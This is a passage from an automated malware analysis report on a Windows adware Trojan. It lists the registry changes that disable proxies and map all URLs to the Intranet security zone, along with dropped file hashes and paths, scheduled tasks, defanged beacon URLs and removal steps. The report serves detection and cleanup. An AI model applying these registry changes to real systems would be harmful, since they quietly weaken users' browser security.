"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"__cxe_type" = ".10100019"
"CAD4DBA9766467bducob23" = "18000000"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"cmpcc" = "UA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"cmpcc_Expiration" = "1441945355227"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE D8 35 F4 E4 60 CD EF 9C B0 F1 DC 25 A7 F1 00"
[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"AAD4DBA9766467evaob23" = "60000"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"E419E2445BF82ob23" = "300000"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process taedko.exe:1988 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB A5 16 D9 CC AE C9 5D 14 0C DD F9 21 73 C3 6F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process dag17797.exe:552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015090820150909]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012015090820150909\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015090820150909]
"CacheOptions" = "11"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015090820150909]
"CacheLimit" = "8192"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015090820150909]
"CachePrefix" = ":2015090820150909:"
"CacheRepair" = "0"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 3B 7A 7A 17 03 FA 6D 1F B5 6E BA 76 AD 76 E6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014041520140416]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
a28a6aa25d416848937de3b817d49784 | c:\Documents and Settings\All Users\Application Data\IlejwTivc\Uninstaller.exe |
740c93fdf9dedfffd5c300aeb9c8eba5 | c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae3ko.dll |
4b0a71b036a1759bd0a9a6d8d7286470 | c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae3ko.exe |
740c93fdf9dedfffd5c300aeb9c8eba5 | c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae3kod.dll |
846c526984e6eaf579d6b26b96cbabb9 | c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae6ko.dll |
59b859426c5cb1f82ca551cdeb3a04ef | c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae6ko.exe |
846c526984e6eaf579d6b26b96cbabb9 | c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae6kod.dll |
a005b797c5ebd5bf0d3bff9d9e0e36b0 | c:\Documents and Settings\All Users\Application Data\IlejwTivc\taeako.exe |
01ee425920c921ca8fbf6710bbb8e705 | c:\Documents and Settings\All Users\Application Data\IlejwTivc\taedko.exe |
44c191f29f65760a5be1f7a4c7a45c12 | c:\Documents and Settings\All Users\Application Data\IlejwTivc\taewko.exe |
98d858a74ed18756c6fa5fcb0ee620fd | c:\Documents and Settings\All Users\Application Data\IlejwTivc\utils.exe |
dae0fba97a137277189223ea9ede1175 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\tmp30731\dag17797.exe |
5264f7d6d89d1dc04955cfb391798446 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\GetVersion.dll |
b140459077c7c39be4bef249c2f84535 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\Math.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\System.dll |
7579ade7ae1747a31960a228ce02e666 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\UserInfo.dll |
5afd4a9b7e69e7c6e312b2ce4040394a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\blowfish.dll |
94ba775c8a1f4d6c9bb1966eddce22b5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\manlib.dll |
fe3f848e2a306d586ab8f5433738d8db | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\nsCBHTML5.dll |
c10e04dd4ad4277d5adc951bb331c777 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\nsDialogs.dll |
5f13dbc378792f23e598079fc1e4422b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\nsisunz.dll |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\registry.dll |
febff2c363c7f7664687eefe8253087e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\serlib.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:924
taeako.exe:900
taeako.exe:2352
taeako.exe:212
taeako.exe:972
taeako.exe:948
taeako.exe:2980
taeako.exe:2644
taeako.exe:1536
taeako.exe:544
taeako.exe:436
taedko.exe:1988 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6ko.dll (39329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\utaujte.js (1447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\Uninstaller.exe (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (101002 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgu.dat (902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\adblocker_installer__1441686123.txt (16441 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\logo.ico (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\tmp.bpu (10136 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.exe (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\jquery4toolbar.js (3312 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.dll (20416 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taedko.exe (13368 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3kod.dll (20416 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\khkiaff.js (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\TrayIcons\logo.ico (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsislog.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\CavnNotn.dll (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgub.dat (569 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6ko.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6kod.dll (39329 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\utils.exe (9527 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\narhokgeb.js (6 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taewko.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\narhokgeb.js (6 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taeadko.bnp (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\khkiaff.js (1856 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\utaujte.js (1447 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taewdko.bnp (6584 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\jquery4toolbar.js (3312 bytes)
%WinDir%\Tasks\Tempo Runner tae3ko.job (1352 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731\dag17797.exe (1509 bytes)
%WinDir%\Tasks\Tempo Runner tae6ko.job (8112 bytes)
%WinDir%\Tasks\Tempo Runner taedko.job (2704 bytes)
%WinDir%\Tasks\Tempo adblocker Runner.job (920 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\lgv[1].js (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cmp_ext[1].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\obbgint[1].js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58 (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ammbg[1].js (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cxeappconf[1].js (482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\getcc[1].php (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\v1[1].htm (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ammapp[1].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\loader[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Offer2.zip (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\SecondResult.txt (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DSS_Unq_IMapplication_mon_remote[1].htm (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\OfferScreen_422.html (1969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsDialogs.dll (9 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version: 1.1.0.31
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.1.0.31
File Description:
Comments:
Language: Language Neutral
Company Name: Product Name: Product Version: 1.1.0.31Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: 1.1.0.31File Description: Comments: Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23130 | 23552 | 4.44841 | 0bc2ffd32265a08d72b795b18265828d |
.rdata | 28672 | 4496 | 4608 | 3.59163 | f179218a059068529bdb4637ef5fa28e |
.data | 36864 | 110488 | 1024 | 3.26405 | 975304d6dd6c4a4f076b15511e2bbbc0 |
.ndata | 147456 | 77824 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 225280 | 16944 | 17408 | 4.08558 | e9d00de7898ae3a42a8383ed8a0b0e7f |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 287
05a7d3434a4f7fdbf0701537409ba2c8
28b85a68ade122e0932bc011d2e4741e
85384e1d38290e1be1b941708ef98de7
90c45221acad769be1f420e26fb96e4e
3e9501bc32b06042e7bcccdf0669fafa
99bbb5f56a0e982061037a96fd219d2e
167d6007985099cb7013fbf1130a54b3
d77835ac151ab2189ea5019f70e1dc9e
c2b1c2a1b9eeb54404eab8ffaac8ab3d
a901bec47b03673fb1dbb3071e83a05f
bcf2db92c2535d1f05c86a8706618c3c
2d6a16c59156f3d26a0161fa787d5ecb
6a17857090567191d9d5407fb1be7a60
14ad705a1481ad0fac61ac3380f71743
4dcc650e7da22e29ee760ae17093af75
63e751baab159c93c34296d8a60d605a
ce32769a77e3a5231c15f461eddfc257
df58c89f399dc0e07adb04521036be4c
e3df55b2211eca7c68f70aff300b5de1
21652c1165a4cc603f5755d9996b329d
083cd9d058cf091f0d2ff94d2183e254
75f54e31f102aa950f332c5557e0b6ae
cee30d0a7c755a06d734276fb2f8b21b
38926abc005c6822d288bee19dc5ed9b
383860ca1a012fc8db9189d1ffb6e360
Network Activity
URLs
URL | IP |
---|---|
hxxp://ghs.googlehosted.com/rp/v/image.jpg | |
hxxp://ghs.googlehosted.com/wrp/ri | |
hxxp://s3-1.amazonaws.com/client-cmd/cr.html?type=install&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132 | |
hxxp://s3-1.amazonaws.com/client-cmd/cr.html?type=install_reg&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132 | |
hxxp://s3-1.amazonaws.com/client-cmd/cr.html?type=strunner&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686141 | |
hxxp://dildmbfdhsxh6.cloudfront.net/amm/apps/121/10100019/loader.js?x=1&cb=1441686142118&yt=81 | |
hxxp://ghs.googlehosted.com/up/v/update | |
